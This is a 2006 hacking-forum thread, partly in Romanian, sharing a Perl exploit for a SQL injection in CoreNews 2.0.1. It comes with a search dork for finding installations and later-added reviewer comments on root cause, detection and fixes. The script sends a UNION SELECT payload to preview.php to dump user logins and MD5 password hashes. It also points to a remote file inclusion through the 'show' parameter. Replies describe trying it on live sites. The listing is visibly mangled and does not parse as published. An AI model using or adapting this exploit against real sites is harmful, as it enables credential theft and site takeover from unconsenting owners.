Screech Posted July 4, 2006 Report Posted July 4, 2006
Download tut: http://rapidshare.de/files/24936927/core_n..._2.0.1.rar.html
Search: Powered by CoreNews 2.0.1
Exploit:
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=24
#Usage: corenews.pl <host> <path>
#
# Reviewer notes (defensive reading of this listing):
# - Purpose: proof-of-concept for the SQL injection in CoreNews <= 2.0.1
#   named in the banner. It sends a single HTTP GET to preview.php with a
#   crafted `userid` value and scans the reply for a login name and a
#   32-character password hash.
# - Root cause (inferred from the payload; the PHP source is not shown on
#   this page): preview.php presumably places `userid` into a SQL statement
#   without validation. Fix on the application side: accept only an integer
#   for userid and bind it as a query parameter instead of concatenating it.
# - Detection: web-server log entries for preview.php?userid= followed by a
#   non-numeric value, the keyword UNION with "/**/" standing in for spaces,
#   and the fixed User-Agent header this script sends.
# - Impact: rows of corenews_users (login, password) are disclosed. The
#   script labels the value an MD5 hash; if exploitation is confirmed,
#   rotate the affected credentials and move password storage to a salted,
#   deliberately slow hash.
# - The closing message also refers to a `show` parameter that the author
#   says allows remote file inclusion once logged in; review it separately
#   (never include a request-supplied path; keep PHP allow_url_include off).
# NOTE(review): the forum rendering mangled this listing (line breaks and
# some characters are missing). It is reproduced as published and does not
# parse as Perl in this form.
use IO::Socket;
# Entry point: exactly two arguments (<host> <path>) are required.
if(@ARGV != 2) { usage(); }
else { exploit(); }
# Prints the advisory banner.
sub header(){
 print "n- NukedX Security Advisory Nr.2006-24rn";
 print "- CoreNews <= 2.0.1 Remote SQL Injection Exploitrn";
}
# Prints the banner and the expected arguments, then exits.
sub usage() {
 header();
 print "- Usage: $0 <host> <path>rn";
 print "- <host> -> Victim's host ex: http://www.victim.comrn";
 print "- <path> -> Path to CoreNews ex: /corenews/rn";
 exit();
}
# Builds the request URL from the two arguments, sends it over a plain TCP
# socket to port 80 and scans the response for the marker-delimited values.
sub exploit () {
 #Our variables...
 # Host argument; the substitution appears intended to drop a leading
 # scheme so the bare host can be used for the socket and Host header.
 $cnserver = $ARGV[0];
 $cnserver =~ s/(http://)//eg;
 $cnhost = "http://".$cnserver;
 $cndir = $ARGV[1];
 $cnport = "80";
 # Vulnerable endpoint and parameter named by this script.
 $cntar = "preview.php?userid=";
 # Value sent as `userid`: a UNION SELECT against corenews_users whose
 # login and password columns are wrapped in numeric markers; the same
 # markers are what the response pattern further down looks for.
 $cnxp = "-1/**/UNION/**/SELECT/**/null,concat(2022,login,20223,password,2203),null,null,null,null/**/FROM/**/corenews_users/*";
 $cnreq = $cnhost.$cndir.$cntar.$cnxp;
 #Sending data...
 header();
 print "- Trying to connect: $cnserverrn";
 $cn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cnserver", PeerPort => "$cnport") || die "- Connection failed...n";
 # Hand-written HTTP/1.1 request; these fixed header values are usable as
 # log-side indicators.
 print $cn "GET $cnreq HTTP/1.1n";
 print $cn "Accept: */*n";
 print $cn "Referer: $cnhostn";
 print $cn "Accept-Language: trn";
 print $cn "User-Agent: NukeZillan";
 print $cn "Cache-Control: no-cachen";
 print $cn "Host: $cnservern";
 print $cn "Connection: closenn";
 print "- Connected...rn";
 # Reads the response line by line; the first line matching the marker
 # pattern is reported (login in $1, 32-character hash in $2) and the
 # script exits.
 while ($answer = <$cn>) {
  if ($answer =~ /2022(.*?)20223([d,a-f]{32})2203/) {
   print "- Exploit succeed!rn";
   print "- Username: $1rn";
   print "- MD5 HASH of PASSWORD: $2rn";
   print "- If you crack hash you can use RFI with example ->rn";
   print "- Example: $cnhost$cndir?show=http://yourhost.com/file.txtrn";
   exit();
  }
 }
 #Exploit failed...
 # Reached only when no response line matched the marker pattern.
 print "- Exploit failedn"
}
[/list:u] Quote
Thunder Posted July 4, 2006 Report Posted July 4, 2006 Mersi . Il iau acum . Revin cu comentarii .. Quote
Thunder Posted July 4, 2006 Report Posted July 4, 2006 Nu mi-a iesit pe niciun site. Oricum, poate oi fi gresit pe undeva. Daca reuseste, iti da md5, pe care doar daca ai noroc poti sa-l "descifrezi" si sa afli passul. Quote
Screech Posted August 8, 2006 Author Report Posted August 8, 2006 QUOTE("johnslax"): "nu mai merge linkul : :@" http://rapidshare.de/files/28591545/core_n..._2.0.1.rar.html Quote
zbeng Posted August 8, 2006 Report Posted August 8, 2006 NU MAI faceti dublu post, pt asta aveti butonul EDIT Quote